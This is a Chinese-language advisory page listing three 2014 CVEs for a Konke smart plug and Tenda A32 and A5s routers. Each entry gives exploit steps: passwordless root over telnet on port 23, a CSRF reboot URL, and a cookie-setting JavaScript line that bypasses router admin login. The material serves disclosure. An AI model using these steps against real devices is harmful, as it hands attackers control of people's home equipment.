CVE中文申请站

CVE-2014-7279:Konke智能插座非授权访问管理接口漏洞

一、漏洞摘要

漏洞名称: Konke智能插座非授权访问管理接口漏洞
上报日期: 2014-10-29
漏洞发现者: gamehacker(gh@waloudong.org)&zixian(me@zixian.org)
产品首页: http://www.ikonke.com/
软件链接: http://www.ikonke.com/
版本: K
CVE编号: CVE-2014-7279


二、漏洞概述

“Konke”是来自中国的一款智能家居产品(http://www.ikonke.com/),该产品存在安全漏洞导致攻击者可以利用漏洞获取设备管理权限。
Konke智能插座加电启动后会打开23端口,攻击者可以直接使用telnet工具登录23端口,可以不用密码得到root权限。

三、利用代码

1、扫描Konke:可以使用nmap等工具对设备的23端口进行扫描;
2、连接设备:使用telnet连接Konke设备的23端口;
3、获得权限:连接成功即可获得root权限。
k.png
并可以看到设备使用openwrt系统架构,可以使用busybox等工具执行系统命令对设备进行进一步的控制。

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/18/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7279
exploit-db:https://www.exploit-db.com/exploits/35103/

CVE-2014-7281:腾达A32无线路由器跨站请求伪造漏洞

一、漏洞摘要

漏洞名称: 腾达A32无线路由器跨站请求伪造漏洞
上报日期: 2014-10-14
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.tenda.com.cn/
软件链接: http://www.tenda.com.cn/download/detail-1824.html
版本: V5.07.53_CN
CVE编号: CVE-2014-7281


二、漏洞概述

腾达A32是深圳市吉祥腾达科技有限公司的一款无线路由器产品(http://www.tenda.com.cn/search/a32.html),该产品V5.07.53_CN固件中存在跨站请求伪造漏洞,管理员登录后访问攻击页面可触发CSRF漏洞,可对设备进行重启等操作。


三、利用代码

管理员登陆后访问如下url,设备将重启。

http://192.168.2.1/goform/SysToolReboot


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/19/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7281
exploit-db:https://www.exploit-db.com/exploits/34969/
MISC:http://packetstormsecurity.com/files/128671/Tenda-A32-Cross-Site-Request-Forgery.html
OSVDB:http://osvdb.org/show/osvdb/113308

CVE-2014-5246:腾达A5s无线路由器认证绕过漏洞

一、漏洞摘要

漏洞名称: 腾达A5s无线路由器认证绕过漏洞
上报日期: 2014-08-18
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.tenda.com.cn/
软件链接: http://www.tenda.com.cn/download/detail-1082.html
版本: V3.02.05_CN
CVE编号: CVE-2014-5246


二、漏洞概述

腾达A5s是深圳市吉祥腾达科技有限公司的一款无线路由器产品(http://www.tenda.com.cn/search/a5s.html),该产品V3.02.05_CN固件中存在认证绕过漏洞,可通过修好cookie信息绕过管理员账号及密码登录路由器后台管理页面进行操作。


三、利用代码

打开无线路由器管理地址。

http://192.168.2.1/

通过javascript脚本设置cookies值。

javascript:document.cookie='admin:language=zh-cn'

打开无线路由器设置页面,即可直接访问并进行管理员操作。

http://192.168.2.1/advance.asp


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/16/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5246
exploit-db:https://www.exploit-db.com/exploits/34361/
MISC:http://packetstormsecurity.com/files/127905/Tenda-A5s-Router-Authentication-Bypass.html
BID:http://www.securityfocus.com/bid/69267
OSVDB:http://osvdb.org/show/osvdb/110146
XF:https://exchange.xforce.ibmcloud.com/vulnerabilities/95337